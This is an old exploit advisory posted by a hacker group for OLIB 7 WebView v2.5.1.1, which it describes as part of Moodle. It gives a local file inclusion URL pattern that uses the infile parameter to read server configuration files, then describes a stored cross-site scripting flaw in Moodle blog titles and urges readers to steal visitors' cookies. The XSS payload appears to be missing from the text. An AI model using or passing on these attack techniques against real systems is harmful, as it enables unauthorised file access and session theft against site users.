Security Advisory for 'OLIB 7 Webview' This software is apart of Moodle. Software - OLIB 7 WebView v2.5.1.1 Exploit - LFI Severity - High Author - ZeN website - http://dusecurity.com/ Date - 2nd October 2008 DUSecurity Team / DarkCode Exploit > http://olib.site.com/cgi/?session=[session_key]&infile=[LFI] files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini Info - You need to login to get a valid session key. ------------------ Extraz : Moodle Permanent XSS In Moodle blogging system, simply make a new blog entry with the title Now everyone that visits the bloggins system with execute your XSS. Go get some cookies =D Enjoy! ------------------ Shouts :- DUSecurity.com DarkCode.me Milw0rm.com iWannaHack WL-Group # milw0rm.com [2008-10-02]